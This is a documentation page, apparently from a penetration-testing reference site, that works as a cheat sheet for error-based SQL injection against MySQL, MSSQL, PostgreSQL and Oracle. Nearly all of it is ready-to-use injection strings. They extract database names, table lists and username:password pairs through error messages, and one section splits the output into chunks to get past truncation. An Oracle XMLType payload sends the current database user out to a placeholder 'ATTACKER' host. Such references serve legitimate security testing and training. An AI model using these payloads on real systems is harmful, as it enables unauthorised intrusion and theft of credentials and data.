> ## Documentation Index
> Fetch the complete documentation index at: https://docs.bytejmp.com/llms.txt
> Use this file to discover all available pages before exploring further.

# Error-Based

> Error-based SQL injection: extract data through database error messages in MySQL, MSSQL, and PostgreSQL.

## Overview

Error-based SQLi extracts data by triggering database errors that include query results in the error message. Requires: verbose error messages displayed on page.

***

## MySQL

### ExtractValue

```
' AND extractvalue(1,concat(0x7e,(SELECT database()),0x7e))-- -
' AND extractvalue(1,concat(0x7e,(SELECT group_concat(table_name) FROM information_schema.tables WHERE table_schema=database()),0x7e))-- -
' AND extractvalue(1,concat(0x7e,(SELECT group_concat(username,0x3a,password) FROM users),0x7e))-- -
```

### UpdateXML

```
' AND updatexml(1,concat(0x7e,(SELECT database()),0x7e),1)-- -
' AND updatexml(1,concat(0x7e,(SELECT group_concat(table_name) FROM information_schema.tables WHERE table_schema=database()),0x7e),1)-- -
```

### Double Query (Subquery)

```
' AND (SELECT 1 FROM (SELECT count(*),concat((SELECT database()),0x3a,floor(rand(0)*2))x FROM information_schema.tables GROUP BY x)a)-- -
```

### Geometry Functions

```
' AND ST_LatFromGeoHash(concat(0x7e,(SELECT database())))-- -
' AND ST_LongFromGeoHash(concat(0x7e,(SELECT database())))-- -
```

***

## MSSQL

### CONVERT / CAST

```
' AND 1=CONVERT(int,(SELECT db_name()))-- -
' AND 1=CONVERT(int,(SELECT top 1 name FROM sysobjects WHERE xtype='U'))-- -
' AND 1=CONVERT(int,(SELECT top 1 username FROM users))-- -
```

```
' AND 1=CAST((SELECT db_name()) AS int)-- -
```

### Having + Group By

```
' HAVING 1=1-- -
' GROUP BY column HAVING 1=1-- -
```

Reveals column names in error message.

***

## PostgreSQL

### CAST Error

```
' AND 1=CAST((SELECT current_database()) AS int)-- -
' AND 1=CAST((SELECT string_agg(table_name,',') FROM information_schema.tables WHERE table_schema='public') AS int)-- -
' AND 1=CAST((SELECT username||':'||password FROM users LIMIT 1) AS int)-- -
```

***

## Oracle

### UTL\_INADDR

```
' AND 1=UTL_INADDR.GET_HOST_ADDRESS((SELECT user FROM dual))-- -
```

### CTXSYS.DRITHSX.SN

```
' AND 1=CTXSYS.DRITHSX.SN(1,(SELECT user FROM dual))-- -
```

### XMLType

```
' AND extractvalue(xmltype('<?xml version="1.0" encoding="UTF-8"?><!DOCTYPE root [<!ENTITY % x SYSTEM "http://'||(SELECT user FROM dual)||'.ATTACKER/">%x;]>'),'/l')-- -
```

***

## Truncation

Error messages often truncate output. Extract in parts:

```
' AND extractvalue(1,concat(0x7e,SUBSTR((SELECT group_concat(username,0x3a,password) FROM users),1,30),0x7e))-- -
' AND extractvalue(1,concat(0x7e,SUBSTR((SELECT group_concat(username,0x3a,password) FROM users),31,30),0x7e))-- -
```

***

## Quick Reference

| Database   | Technique                              |
| ---------- | -------------------------------------- |
| MySQL      | `extractvalue(1,concat(0x7e,(QUERY)))` |
| MySQL      | `updatexml(1,concat(0x7e,(QUERY)),1)`  |
| MSSQL      | `CONVERT(int,(QUERY))`                 |
| PostgreSQL | `CAST((QUERY) AS int)`                 |
| Oracle     | `UTL_INADDR.GET_HOST_ADDRESS((QUERY))` |

***

## Sources

* [PortSwigger — SQL Injection Cheat Sheet](https://portswigger.net/web-security/sql-injection/cheat-sheet)
* [OWASP — Error Based SQL Injection](https://owasp.org/www-community/attacks/SQL_Injection)
* [PortSwigger — Blind SQL Injection](https://portswigger.net/web-security/sql-injection/blind)
